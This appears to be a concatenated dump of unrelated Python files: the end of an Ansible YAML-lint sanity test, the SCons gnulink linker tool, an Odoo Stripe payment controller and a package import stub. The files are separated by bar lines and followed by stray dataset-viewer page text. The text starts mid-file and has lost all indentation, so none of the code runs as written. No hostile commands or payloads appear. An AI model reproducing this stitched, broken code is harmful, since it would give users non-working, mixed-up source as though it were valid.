print(json.dumps(report, indent=4, sort_keys=True))
def check(self, paths): # type: (t.List[str]) -> None
"""Check the specified paths."""
config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config')
yaml_conf = YamlLintConfig(file=os.path.join(config_path, 'default.yml'))
module_conf = YamlLintConfig(file=os.path.join(config_path, 'modules.yml'))
plugin_conf = YamlLintConfig(file=os.path.join(config_path, 'plugins.yml'))
for path in paths:
extension = os.path.splitext(path)[1]
with open(path) as file:
contents = file.read()
if extension in ('.yml', '.yaml'):
self.check_yaml(yaml_conf, path, contents)
elif extension == '.py':
if path.startswith('lib/ansible/modules/') or path.startswith('plugins/modules/'):
conf = module_conf
else:
conf = plugin_conf
self.check_module(conf, path, contents)
else:
raise Exception('unsupported extension: %s' % extension)
def check_yaml(self, conf, path, contents): # type: (YamlLintConfig, str, str) -> None
"""Check the given YAML."""
self.check_parsable(path, contents)
self.messages += [self.result_to_message(r, path) for r in linter.run(contents, conf, path)]
def check_module(self, conf, path, contents): # type: (YamlLintConfig, str, str) -> None
"""Check the given module."""
docs = self.get_module_docs(path, contents)
for key, value in docs.items():
yaml_data = value['yaml']
lineno = value['lineno']
fmt = value['fmt']
if fmt != 'yaml':
continue
if yaml_data.startswith('\n'):
yaml_data = yaml_data[1:]
lineno += 1
self.check_parsable(path, yaml_data, lineno)
messages = list(linter.run(yaml_data, conf, path))
self.messages += [self.result_to_message(r, path, lineno - 1, key) for r in messages]
def check_parsable(self, path, contents, lineno=1): # type: (str, str, int) -> None
"""Check the given contents to verify they can be parsed as YAML."""
try:
yaml.load(contents, Loader=TestLoader)
except MarkedYAMLError as ex:
self.messages += [{'code': 'unparsable-with-libyaml',
'message': '%s - %s' % (ex.args[0], ex.args[2]),
'path': path,
'line': ex.problem_mark.line + lineno,
'column': ex.problem_mark.column + 1,
'level': 'error',
}]
@staticmethod
def result_to_message(result, path, line_offset=0, prefix=''): # type: (t.Any, str, int, str) -> t.Dict[str, t.Any]
"""Convert the given result to a dictionary and return it."""
if prefix:
prefix = '%s: ' % prefix
return dict(
code=result.rule or result.level,
message=prefix + result.desc,
path=path,
line=result.line + line_offset,
column=result.column,
level=result.level,
)
def get_module_docs(self, path, contents): # type: (str, str) -> t.Dict[str, t.Any]
"""Return the module documentation for the given module contents."""
module_doc_types = [
'DOCUMENTATION',
'EXAMPLES',
'RETURN',
]
docs = {}
fmt_re = re.compile(r'^# fmt:\s+(\S+)')
def check_assignment(statement, doc_types=None):
"""Check the given statement for a documentation assignment."""
for target in statement.targets:
if not isinstance(target, ast.Name):
continue
if doc_types and target.id not in doc_types:
continue
fmt_match = fmt_re.match(statement.value.s.lstrip())
fmt = 'yaml'
if fmt_match:
fmt = fmt_match.group(1)
docs[target.id] = dict(
yaml=statement.value.s,
lineno=statement.lineno,
end_lineno=statement.lineno + len(statement.value.s.splitlines()),
fmt=fmt.lower(),
)
module_ast = self.parse_module(path, contents)
if not module_ast:
return {}
is_plugin = path.startswith('lib/ansible/modules/') or path.startswith('lib/ansible/plugins/') or path.startswith('plugins/')
is_doc_fragment = path.startswith('lib/ansible/plugins/doc_fragments/') or path.startswith('plugins/doc_fragments/')
if is_plugin and not is_doc_fragment:
for body_statement in module_ast.body:
if isinstance(body_statement, ast.Assign):
check_assignment(body_statement, module_doc_types)
elif is_doc_fragment:
for body_statement in module_ast.body:
if isinstance(body_statement, ast.ClassDef):
for class_statement in body_statement.body:
if isinstance(class_statement, ast.Assign):
check_assignment(class_statement)
else:
raise Exception('unsupported path: %s' % path)
return docs
def parse_module(self, path, contents): # type: (str, str) -> t.Optional[ast.Module]
"""Parse the given contents and return a module if successful, otherwise return None."""
try:
return ast.parse(contents)
except SyntaxError as ex:
self.messages.append(dict(
code='python-syntax-error',
message=str(ex),
path=path,
line=ex.lineno,
column=ex.offset,
level='error',
))
except Exception as ex: # pylint: disable=broad-except
self.messages.append(dict(
code='python-parse-error',
message=str(ex),
path=path,
line=0,
column=0,
level='error',
))
return None
if __name__ == '__main__':
main()
|
"""SCons.Tool.gnulink
Tool-specific initialization for the gnu linker.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
__revision__ = "src/engine/SCons/Tool/gnulink.py 2014/09/27 12:51:43 garyo"
import SCons.Util
import link
def generate(env):
"""Add Builders and construction variables for gnulink to an Environment."""
link.generate(env)
if env['PLATFORM'] == 'hpux':
env['SHLINKFLAGS'] = SCons.Util.CLVar('$LINKFLAGS -shared -fPIC')
# __RPATH is set to $_RPATH in the platform specification if that
# platform supports it.
env['RPATHPREFIX'] = '-Wl,-rpath='
env['RPATHSUFFIX'] = ''
env['_RPATH'] = '${_concat(RPATHPREFIX, RPATH, RPATHSUFFIX, __env__)}'
def exists(env):
# TODO: sync with link.smart_link() to choose a linker
linkers = { 'CXX': ['g++'], 'CC': ['gcc'] }
alltools = []
for langvar, linktools in linkers.items():
if langvar in env: # use CC over CXX when user specified CC but not CXX
return SCons.Tool.FindTool(linktools, env)
alltools.extend(linktools)
return SCons.Tool.FindTool(alltools, env) # find CXX or CC
|
import logging
import pprint
import werkzeug
from odoo import http
from odoo.http import request
_logger = logging.getLogger(__name__)
class StripeController(http.Controller):
@http.route(['/payment/stripe/s2s/create_json'], type='json', auth='public')
def stripe_s2s_create_json(self, **kwargs):
acquirer_id = int(kwargs.get('acquirer_id'))
acquirer = request.env['payment.acquirer'].browse(acquirer_id)
return acquirer.s2s_process(kwargs)
@http.route(['/payment/stripe/s2s/create'], type='http', auth='public')
def stripe_s2s_create(self, **post):
acquirer_id = int(post.get('acquirer_id'))
acquirer = request.env['payment.acquirer'].browse(acquirer_id)
acquirer.s2s_process(post)
return werkzeug.utils.redirect(post.get('return_url', '/'))
@http.route(['/payment/stripe/create_charge'], type='json', auth='public')
def stripe_create_charge(self, **post):
""" Create a payment transaction
Expects the result from the user input from checkout.js popup"""
tx = request.env['payment.transaction'].sudo().browse(
int(request.session.get('sale_transaction_id') or request.session.get('website_payment_tx_id', False))
)
response = tx._create_stripe_charge(tokenid=post['tokenid'], email=post['email'])
_logger.info('Stripe: entering form_feedback with post data %s', pprint.pformat(response))
if response:
request.env['payment.transaction'].sudo().form_feedback(response, 'stripe')
return post.pop('return_url', '/')
|
from . import res_partner
from . import res_company
from . import wizard
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.